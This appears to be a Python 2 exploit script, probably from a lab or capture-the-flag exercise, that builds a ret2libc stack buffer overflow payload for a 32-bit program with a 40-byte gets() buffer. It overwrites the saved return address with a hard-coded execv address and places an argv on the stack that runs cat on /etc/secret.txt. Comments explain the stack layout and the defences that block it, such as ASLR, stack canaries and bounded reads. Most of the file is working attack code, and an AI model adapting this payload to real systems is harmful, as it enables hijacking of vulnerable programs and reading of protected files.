#!/usr/bin/env python
# Payload generator for a classic stack buffer overflow: it writes
# (padding + a fake stack frame) to stdout so that the target's 40-byte
# gets() buffer overruns into the saved return address, which is pointed
# at execv() with an argv that is carried in the same input.
#
# NOTE(review): the byte/str handling below (b"..." + '\0', and writing a
# bytes value to sys.stdout) only works where str *is* bytes, i.e. under
# Python 2 — on Python 3 those lines raise TypeError. The shebang suggests
# Python 2 was intended; confirm before running it elsewhere.
#
# Defender's reading: every address here is a hard-coded constant, so the
# payload only lines up when the stack and the libc mapping sit at the same
# addresses on every run (exactly what ASLR and PIE are meant to prevent).
# A stack canary between the buffer and the saved ebp would also abort the
# process before the overwritten return address is used, and replacing
# gets() with a bounded read removes the overflow altogether.
import sys
import struct
import subprocess  # unused in this script
import re          # unused in this script
import resource    # unused in this script
# Command to execute: the path followed by its argv entries; each gets
# NUL-terminated below. Note the mix of a bytes and a str literal (see NOTE).
command = [b"/usr/bin/cat", "/etc/secret.txt"]
# Padding to overflow buffer + ebp so the next value on the stack is the return address
# (40-byte gets() buffer + 4-byte saved ebp, per the layout sketched below).
padding = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR"
assert len(padding) == 44, "padding should be 44 bytes long"
# Stack (esp at time right before leave/ret function exit)
#
# [datap] arguments for first function
# 4 bytes: 2nd return address
# [esp] 4 bytes: return address
# 4 bytes: old value of ebp
# 40 bytes: size of gets() buffer
#
# The esp/ebp naming and 4-byte words imply a 32-bit x86 target. Both
# constants below are observed values for one specific binary and run;
# nothing in this script computes or verifies them.
esp = 0xffffd5ac
# Where the argv strings will land: just past the four 4-byte words that
# make up `stack` below (the assert before `data` is appended checks this).
datap = esp + 16
return_address = 0xf7ed0ff0 # execv
# Build data: first the NUL-terminated strings, then the argv pointer
# array (one pointer per string, NULL-terminated) that directly follows them.
data = b""
for arg in command: data += arg + '\0'
data_len = 0
for arg in command:
    # Pointer to the start of this string inside the string area.
    data += struct.pack("@I", datap + data_len)
    data_len += len(arg) + 1
# After the loop data_len equals the total length of the string area, so
# the pointer array starts at datap + data_len.
data += struct.pack("@I", 0)
# Build the fake frame as seen once the saved return address is consumed:
#   1. return_address -> execv
#   2. 0xdeadbeef     -> execv's own return address (it is never meant to return)
#   3. datap          -> execv's path argument (first string)
#   4. datap+data_len -> execv's argv argument (the pointer array)
# "@I" packs in native byte order and size; the layout relies on 4-byte words.
stack = struct.pack("@I", return_address)
stack += struct.pack("@I", 0xdeadbeef)
stack += struct.pack("@I", datap)
stack += struct.pack("@I", datap + data_len)
assert datap == len(stack) + esp, "data pointer should point to stack above arguments"
stack += data
# Emit padding followed by the fake frame and its data on stdout.
sys.stdout.write(padding + stack)